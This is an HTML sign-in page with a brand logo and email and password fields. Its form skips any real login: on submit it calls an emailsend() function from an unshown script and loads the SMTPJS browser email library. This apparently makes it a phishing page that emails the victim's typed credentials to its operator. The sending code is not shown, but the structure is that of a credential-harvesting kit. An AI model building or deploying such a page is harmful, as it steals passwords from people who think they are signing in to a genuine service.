<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign In</title>
    <link rel="stylesheet" href="style.css">
    <link rel="stylesheet" href="responsive.css">
    <style>
        .content{
            /* border: 5px solid red; */
            position: absolute;
            height: 400px;
            /* width: 600px; */
            display: flex;
            justify-content: center;
        }
        .lm{
            position: absolute;
        }
       
        .btn{
            margin-bottom: 350px;
            width: 300px;
            height: 30px;
        }
        .ch{
            /* border: 5px solid grey; */
            background-color: rgba(0, 0, 0, 0.637);
            border-radius: 5px;
            width: 400px;
            height: 400px;
        }
    </style>
</head>
<body>
    <div class="div">
    </div>
    <div class="lm">
            
        <img src="img/BrandAssets_Logos_01-Wordmark-Photoroom.png" alt="logo">
        
    </div>
           
    <div class="content">
        <div class="ch">

            <form onsubmit="emailsend(); reset(); return false;">
                
                <h1>Sign In 
                </h1>
                
                <input type="email" class="email"  placeholder="Email address" name="email" required><br>
                            <input type="password" class="password"  placeholder="Enter Password" name="password" required><br>

                            <button type="submit" class="btn">Sign In</button>
                        </form>
                    </div>
            </div>
        
            <script src="index.js"></script>
            <script src="https://smtpjs.com/v3/smtp.js">
            </script>
            <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
         
    
        </body>
</html>